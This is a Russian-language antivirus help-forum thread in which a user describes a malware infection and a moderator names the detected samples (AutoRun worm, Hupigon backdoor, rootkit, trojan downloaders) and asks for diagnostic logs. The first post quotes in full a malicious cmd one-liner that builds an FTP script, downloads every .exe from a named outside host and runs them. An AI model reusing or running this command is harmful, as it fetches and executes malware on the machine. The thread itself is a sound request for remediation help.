• Администрация SafeZone приветствует вас на нашем форуме!
    Если вы больше не желаете видеть рекламу при просмотре тем и сообщений - то достаточно просто зарегистрироваться. Для зарегистрированных пользователей реклама не отображается.

Решена Много вирусов

Статус
В этой теме нельзя размещать новые ответы.

Dukales

Активный пользователь
Сообщения
4
Симпатии
0
#1
у меня та же проблема (была - переустановил Windows):
я недавно заметил, что в процессах висит такая комманда:
Cmd /c md SC&cd SC&del /f /s /q *.*&echo open scan.zavan.info>k.x&echo out>>k.x&echo 123>>k.x&Echo mget *.exe>>k.x&Echo bye>>k.x&ftp -i -s:k.x&del k.x&echo for %%i in (*.exe) do start %%i>D.bat&D.bat&del D.bat

с порождённой им ftp -i -s:k.x
Ну я зашёл на этот адрес - там пусто, даже LIST не выполняется. Как сделать так, чтобы эта комманда не запускалась - я не знал и смирился.
Потом мне посчасливилось по несусветной глупости установить некий flowMediaDecoder_60, который представлял из себя ленту новостей с вымогательством :), закрывающей обзор в IE.
На сайте http://www.spyware-ru.com/ прочитал что надо делать - отключил антивирус и запустил ComboFix.exe - на одном из шагов требовалось. Интернет был включен... Видимо на фтп появилась новая подборка свежайших китайских вирусов))). Вот они безболезненно скачались и прорвало... В процессах висело штук 20 их копий, которые запускали друг друга наперебой, когда убиваешь один из них (жаль сразу все не убить - даже в продвинутом procexp нет такой функции), эксплорер нельзя открыть (сначала вообще-то открывал китайские сайты сам по себе). Сам файл ComboFix.exe был удалён ими видимо (а может и показалось). Всё зависло - я перезагрузил машину. Запуская сканирование NOD32 (2.7 версии) они пытались закрыть окно. Сам резидентный модуль был ими деинсталлирован - в процессах его не висело, переустановка ни к чему не приводила. Я создал документ с именем nod32.txt и открыл блокнотом - он закрылся :). Я знал, что есть функция GetWindowText. Всё кончено - подумал я :(.
Потом я не долго думая зашёл на фтп scan.zavan.info и скачал их все и запаковал. До сих пор их сигнатуры не находятся в базах nod32 (10.02.09 числа) - при распаковке - тихо.
8 штук с фтп. И ещё я нашёл на дисках (2 жёстких отцепил перед установкой Windows - чтобы сначала отключить autorun полностью всех типов устройств и скачать базы для nod32 последние предварительно) в корнях какие-то auto.exe и boot.exe - они nod32 определяются как вредоносные. плюс эта "новостная лента" flowMediaDecoder_60.exe. Пароль - virus.
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
14,808
Симпатии
12,158
#2
auto.exe - Worm.Win32.AutoRun.ztg (аккуратнее с флешками)
boot.exe - not-a-virus:AdWare.Win32.AdMedia.ed

А также (папка viruses):
Trojan-Downloader.Win32.VB.kmn
Backdoor.Win32.Hupigon.fyvq
Trojan-Downloader.Win32.Agent.bexi


вывод: помойка однако :(

Что неопознанно разошлю вирлабам.

[info]Вложения удалил т.к. в основном пользователи не имеют достаточной квалификации для работы с мальварой, то они смогут заразится.
[/info]
 

Dukales

Активный пользователь
Сообщения
4
Симпатии
0
#4
да уж =( ... помойка - главное все враз скачались.

Скажите пожалуйста, где искать эту комманду?
Нигде я не нашёл - искал программкой autoruns с sysinternals.com

Не подозреваю - всё переустанавливал как резведчик: драйвера с оффсайтов скачивал только, диски отцеплял, авторан выключил по маске 0xFF.
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
14,808
Симпатии
12,158
#5
Смените пароли на "критических направлениях".
 

akok

Команда форума
Администратор
Сообщения
14,808
Симпатии
12,158
#6
Завершаем анализ:

flowMediaDecoder_60.exe - Trojan.Win32.Agent2.dmq
Rootkit.Win32.Small.uc
Trojan.MulDrop.29482
DDoS.Attack.123
 

akok

Команда форума
Администратор
Сообщения
14,808
Симпатии
12,158
#7
похоже батник в автозагрузке. Сделайте лог RSIT посмотрим (интернет не отключаем, для скачивания HJT).
 

Dukales

Активный пользователь
Сообщения
4
Симпатии
0
#8
дело в том, что я уже переустановил Windows - иначе никак не оживить было систему - поэтому, быть может ценные, следы пребывания этих злосчастных вирусов на моей машине исчезли...
спасибо за помощь.
 

Dukales

Активный пользователь
Сообщения
4
Симпатии
0
#9
логи RSIT на всякий случай
 
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
14,808
Симпатии
12,158
#10
Приятно смотреть на читсую машину :D
 

anjeyvit

Активный пользователь
Сообщения
1
Симпатии
0
#11
Аваст постоянно обнаруживает вирус Win32:Confi [Wrm]

один находиться по адресу C:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\... (создает себе папку а сам вирус остаеться в формате *.jpg или *.gif)
другой, с именем файла х, но без расширения находиться по адресу C:\WINDOWS\system32

Причем, если второй аваст благополучно удаляет, то насчет второго он говорит что произошла ошибка или файл используеться другим приложением, приходиться удалять вручную.
помогите избавиться от этого
 

akok

Команда форума
Администратор
Сообщения
14,808
Симпатии
12,158
#12
Приветствую.

Для корректной помощи нам необходимо увидеть Ваши логи :)
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу